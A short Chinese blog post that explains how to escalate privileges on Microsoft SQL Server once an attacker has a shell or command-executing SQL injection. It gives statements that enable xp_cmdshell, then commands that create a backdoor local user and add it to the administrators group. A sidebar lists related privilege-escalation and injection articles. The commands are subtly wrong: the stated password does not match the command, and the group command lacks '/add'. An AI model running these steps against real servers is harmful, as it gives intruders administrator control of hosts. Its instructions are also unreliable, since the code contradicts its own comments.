MSSQL提权之xp_cmdshell

Stella981
• 阅读 1079

0x01 前提

  1. getshell或者存在sql注入并且能够执行命令。

  2. sql server是system权限,sql server默认就是system权限。

0x02 xp_cmdshell

有了xp_cmdshell的话可以执行系统命令,该组件默认是关闭的,因此需要把它打开。

开启xp_cmdshell

exec sp_configure 'show advanced options', 1;reconfigure;
exec sp_configure 'xp_cmdshell',1;reconfigure;

关闭xp_cmdshell

exec sp_configure 'show advanced options', 1;reconfigure;
exec sp_configure 'xp_cmdshell', 0;reconfigure

0x03 提权

exec master..xp_cmdshell 'net user test pinohd123. /add'    添加用户test,密码test
exec master..xp_cmdshell 'net localgroup administrators test add'    添加test用户到管理员组

  MSSQL提权之xp_cmdshell

点赞
收藏
评论区
推荐文章
待兔 待兔
4天前
手写Java HashMap源码
HashMap的使用教程HashMap的使用教程HashMap的使用教程HashMap的使用教程HashMap的使用教程22
李志宽 李志宽
2年前
Windows提权方法大全汇总(值的收藏)
一、无引号服务路径(TrustedServicePaths)先说实用度,比较被动,而且比较看脸。Windows下服务的权限通常是SYSTEM。如果我们能够替换服务的启动程序为我们的恶意程序(如反弹shell),即相当于获得了SYSTEM权限,达到了提权的目的。无引号服务路径有可能会导致这种情况的发生。所谓无引号服务路径,就是服务启动程序的路径中包含
Wesley13 Wesley13
2年前
Oracle数据库提权(dba权限执行系统命令)
0x01提权准备这里我们先创建一个低权限的用户testSQLconnsys/admin123@orclassysdba;已连接。SQLcreateusertestidentifiedbytest;然后查看一下权限SQLselectfrom
Stella981 Stella981
2年前
Linux提权的几种常用方式
在渗透测试过程中,提升权限是非常关键的一步,攻击者往往可以通过利用内核漏洞/权限配置不当/root权限运行的服务等方式寻找突破点,来达到提升权限的目的。1、内核漏洞提权提起内核漏洞提权就不得不提到脏牛漏洞(DirtyCow),是存在时间最长且影响范围最广的漏洞之一。低权限用户可以利用该漏洞实现本地提权,同时可以通过该漏洞实现D
Stella981 Stella981
2年前
SQLServer数据库及注入方法
目录SQLServer数据库SQLServer数据库的查询语句SA权限开启xp\_cmdshell获取主机权限盲注SQLServer数据库SQLServer数据库SQLServer数据库是由Microsoft开发和推广的关系数据库管理系统(DBMS),是一个比较大型的数据库。端
Wesley13 Wesley13
2年前
mysql localhost可以连输入本机ip地址连接不了
Mysql默认是没有开启这个权限的(只允许使用host:localhost,或者host:127.0.0.1),如果想用host:192.168.1.\,来访问mysql,需要手动开启这个权限进入Mysql终端输入这个命令1.打开cmd窗口,进入MySql安装的bin目录2.执行命令登录数据库,之后会出现一行要你输入
Stella981 Stella981
2年前
CTF中对web服务器各种提权姿势
    在我们拿下服务器web服务往往只是低权限用户,对于内网渗透,我们往往需要root权限,Linux系统提权包括使用溢出漏洞已及利用系统配置文件。提权前提:1.拿到低权限shell2.被入侵机器上有nc,python,perl等常见linux下的工具3.有权上传下载文件1. 利用内
Easter79 Easter79
2年前
SQLServer数据库及注入方法
目录SQLServer数据库SQLServer数据库的查询语句SA权限开启xp\_cmdshell获取主机权限盲注SQLServer数据库SQLServer数据库SQLServer数据库是由Microsoft开发和推广的关系数据库管理系统(DBMS),是一个比较大型的数据库。端
Wesley13 Wesley13
2年前
2.18 特殊权限set_uid 2.19 特殊权限set_gid 2.20 特殊权限stick_bit 2.21 软链接文件 2.22 硬连接文件
set\_uid权限说明:setuid权限针对二进制可执行文件,使文件在执行阶段具有文件所有者的权限。比如passwd这个命令就具有该权限。当普通用户执行passwd命令时,可以临时获得root权限,从而可以更改密码。作用:setuid的作用是保证普通用户临时拥有该命令所有者的身份。给一个文件设置成setuid,前提这个文件是一个二
linux云服务器常用设置
更改shell  默认地,ubuntu系统默认的shell是dash,但更常用的shell是bash  通过下面命令可以将dash更改为bashdpkgreconfiguredash  然后选  执行lsl/bin/sh命令,查看shell类型已经修改为bashlsl/bin/sh帐号权限  为了提高服务器安全性,需要设置一个高权限的账号来代替